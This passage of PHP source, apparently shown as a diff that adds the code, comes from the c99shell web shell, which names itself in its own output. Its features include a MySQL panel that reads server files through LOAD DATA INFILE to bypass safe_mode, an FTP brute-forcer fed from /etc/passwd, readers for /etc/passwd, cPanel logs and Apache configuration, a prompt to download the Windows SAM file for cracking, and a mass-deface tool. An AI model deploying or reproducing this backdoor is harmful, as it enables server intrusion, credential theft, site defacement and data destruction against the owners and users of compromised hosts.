variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_error();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b> +"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_error();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + echo "<option value=\"\">Databases (...)</option> +"; + $c = 0; + while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option> +"; $c++;} + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + if ($sql_db) + { + echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}} + echo "</b></center>"; + + $acts = array("","dump"); + + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if ($submit) + { + if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + } + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtpl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();} + } + elseif ($sql_act == "dump") + { + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "print"; + if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;} + elseif ($dump_out == "download") + { + @ob_clean(); + header("Content-type: c99shell"); + header("Content-disposition: attachment; filename=\"".$f."\";"); + $set["print"] = 1; + $set["nl2br"] = 1; + } + $set["file"] = $dump_file; + $set["add_drop"] = true; + $ret = mysql_dump($set); + if ($dump_out == "download") {exit;} + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>"; + echo "<td><center><b>Table</b></center></td>"; + echo "<td><b>Rows</b></td>"; + echo "<td><b>Type</b></td>"; + echo "<td><b>Created</b></td>"; + echo "<td><b>Modified</b></td>"; + echo "<td><b>Size</b></td>"; + echo "<td><b>Action</b></td>"; + echo "</tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) + { + $tsize += $row["5"]; + $trows += $row["5"]; + $size = view_size($row["5"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>"; + echo "<td>".$row[3]."</td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td>".$size."</td>"; + echo "<td> +&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a> +&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a> +<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$surl."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp; +</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>»</b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\"> +<option>With selected:</option> +<option value=\"drop\" >Drop</option> +<option value=\"empty\" >Empty</option> +<option value=\"chk\">Check table</option> +<option value=\"Optimize table\">Optimize table</option> +<option value=\"Repair table\">Repair table</option> +<option value=\"Analyze table\">Analyze table</option> +</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>"; + mysql_free_result($result); + } + } + } + else + { + $acts = array("","newdb","serverstat","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + elseif (($sql_act == "getfile")) + { + if (!mysql_create_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();} + elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();} + else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));} + } + mysql_free_result($result); + if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");} + } + } + } + } + } + echo "</tr></table></table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}} + echo "<br><br>"; + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if ($win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) + { + if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;} + else {$true = true;} + } + else {$true = true;} + if ($true) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return true; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + $success++; + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>"; + } + } + else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";} + } +} +if ($act == "lsa") +{ + echo "<center><b>Server security information:</b></center>"; + echo "<b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>"; + echo "<b>Safe-Mode: ".$hsafemode."</b><br>"; + echo "<b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + $num = $nixpasswd + $nixpwdperpage; + echo "<b>*nix /etc/passwd:</b><br>"; + $i = $nixpasswd; + while ($i < $num) + { + $uid = posix_getpwuid($i); + if ($uid) {echo join(":",$uid)."<br>";} + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+.</font></b><br>";} + } +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} + else + { + echo "<b>File-System buffer</b><br><br>"; + $ls_arr = $arr; + $disp_fullpath = true; + $act = "ls"; + } +} +if ($act == "selfremove") +{ + if (!empty($submit)) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + $v = array(); + for($i=0;$i<8;$i++) {$v[] = "<a href=\"".$surl."\"><u><b>NO</b></u></a>";} + $v[] = "<a href=\"#\" onclick=\"if (confirm('Are you sure?')) document.location='".$surl."act=selfremove&submit=1';\"><u>YES</u></a>"; + shuffle($v); + $v = join("&nbsp;&nbsp;&nbsp;",$v); + echo "<b>Self-remove: ".__FILE__." <br>Are you sure?</b><center>".$v."</center>"; + } +} +if ($act == "massdeface") +{ + if (empty($deface_in)) {$deface_in = $d;} + if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;} + if (empty($deface_text_wwo)) {$deface_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + + $text = $deface_text; + $text_regexp = $deface_text_regexp; + if (empty($text)) {$text = " "; $text_regexp = 1;} + + $a = array + ( + "name"=>$deface_name, "name_regexp"=>$deface_name_regexp, + "text"=>$text, "text_regexp"=>$text_regxp, + "text_wwo"=>$deface_text_wwo, + "text_cs"=>$deface_text_cs, + "text_not"=>$deface_text_not + ); + $defacetime = getmicrotime(); + $in = array_unique(explode(";",$deface_in)); + foreach($in as $v) {c99fsearch($v);} + $defacetime = round(getmicrotime()-$defacetime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = $dspact = "ls"; + } + } + else + { + if (empty($deface_preview)) {$deface_preview = 1;} + if (empty($deface_html)) {$deface_html = "</div></table><br>Mass-defaced with c99shell v. ".$shver.", coded by tristram[<a href=\"http://ccteam.ru\">CCTeaM</a>].</b>";} + } + echo "<form method=\"POST\">"; + if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";} + echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\"> +<b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp +<br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\"> +<br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text +<br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b> +<br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea> +<br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>"; + if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";} +} +if ($act == "search") +{ + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) + { + c99fsearch($v); + } + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = true; + $act = $dspact = "ls"; + } + } + echo "<form method=\"POST\"> +<input type=\"hidden\" name=\"d\" value=\"".$dispd."\"> +<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp +<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text +<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>"; + if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";} +} +if ($act == "chmod") +{ + $perms = fileperms($d.$f); + if (!$perms) {echo "Can't get current mode.";} + elseif ($submit) + { + if (!isset($owner[0])) {$owner[0] = 0;} + if (!isset($owner[1])) {$owner[1] = 0; } + if (!isset($owner[2])) {$owner[2] = 0;} + if (!isset($group[0])) {$group[0] = 0;} + if (!isset($group[1])) {$group[1] = 0;} + if (!isset($group[2])) {$group[2] = 0;} + if (!isset($world[0])) {$world[0] = 0;} + if (!isset($world[1])) {$world[1] = 0;} + if (!isset($world[2])) {$world[2] = 0;} + $sum_owner = $owner[0] + $owner[1] + $owner[2]; + $sum_group = $group[0] + $group[1] + $group[2]; + $sum_world = $world[0] + $world[1] + $world[2]; + $sum_chmod = "0".$sum_owner.$sum_group.$sum_world; + $ret = @chmod($d.$f, $sum_chmod); + if ($ret) {$act = "ls";} + else {echo "<b>Changing file-mode (".$d.$f.")</b>: error<br>";} + } + else + { + echo "<b>Changing file-mode</b><br>"; + $perms = view_perms(fileperms($d.$f)); + $length = strlen($perms); + $owner_r = $owner_w = $owner_x = + $group_r = $group_w = $group_x = + $world_r = $world_w = $group_x = ""; + + if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";} + if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";} + if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";} + if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";} + if ($perms[9] == "x") {$world_x = " checked";} + echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'> +<input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error> +<input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error> +<table><tr><td><table align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br> +<input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br> +<input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td><b>Group</b><br><br> +<input type=checkbox NAME=group[0] value=4".$group_r.">Read<br> +<input type=checkbox NAME=group[1] value=2".$group_w.">Write<br> +<input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td> +<td><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br> +<input type=checkbox NAME=world[1] value=2".$world_w.">Write<br> +<input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td> +</tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"Save\"></td></tr></table></FORM>"; + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\","/",$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile[tmp_name])) + { + if (empty($uploadfilename)) {$destin = $uploadfile[name];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "Error uploading file 